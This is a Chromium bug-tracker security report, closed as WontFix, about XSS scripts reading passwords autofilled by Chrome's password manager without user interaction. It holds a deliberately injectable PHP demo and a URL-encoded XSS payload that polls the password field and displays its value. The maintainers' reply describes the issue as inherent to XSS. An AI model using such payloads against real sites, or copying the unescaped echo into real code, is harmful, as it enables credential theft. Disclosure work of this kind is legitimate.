New issue
Advanced search Search tips
Starred by 3 users

Issue metadata

Status: WontFix
Owner: ----
Closed: Jan 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security

Sign in to add a comment

Security: User Password Leakage from Password Manager by XSS without User Interation

Reported by, Jan 17 2017 Back to list

Issue description

It seems Chrome prohibit to get user's password from password manager by XSS. When a malicious script try to read password field, it will returns blank value even if it looks filled password by password manager. After user operation, such as key press or click any html elements, script can get password which is filled by password manager. 
However, when user moved to the XSSed page by using JavaScript, for example by using location.href, a malicious script can get password without any user operation.
It seems that security restriction of password manager is bypassed.
And I think this should be fixed because it is similar to below:

Chrome Version: 55.0.2883.87 m
Operating System: Windows7 SP1 and OS X 10.11.6

I put demonstration on my server:

Source of this php is below:
if(!isset($_GET{"xss"}) && !isset($_POST{"pass"})) {
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
Please click below to fire XSS.<br>
<a href="?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27">a tag (does not work without user operation)</a><br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">location.href (works without user operation)</a>
  var a='<?php echo $_GET{"xss"} ?>';

Best regards,
Components: UI>Browser>Passwords
>It seems Chrome prohibit to get user's password from password manager by XSS.

I'm not aware of any attempt to prevent reading of an autofilled password field from JavaScript, but even if there were such a feature, it couldn't be effective. An attacker could easily use script to modify the form target and submit it, leaking the credentials.

This is similar to  Issue 659953 ; XSS attacks are inherently powerful, and theft of credentials is but one consequence of that.
Status: WontFix

Comment 3 by, Jan 18 2017

Thank you for your confirmation. I understand this is by design.
I think that chrome users who use password manager must know this risk. Could you please change permission of this ticket from Restrict to Public? 
Labels: -Restrict-View-SecurityTeam allpublic
> I'm not aware of any attempt to prevent reading of an autofilled 
> password field from JavaScript

I was mistaken. This does exist, but it's trivially circumvented. The class in question is PasswordValueGatekeeper, found in password_autofill_agent.h

The remainder of the remark is correct, however (this isn't intended or effective as a mitigation against XSS).
 Issue 726309  has been merged into this issue.

Sign in to add a comment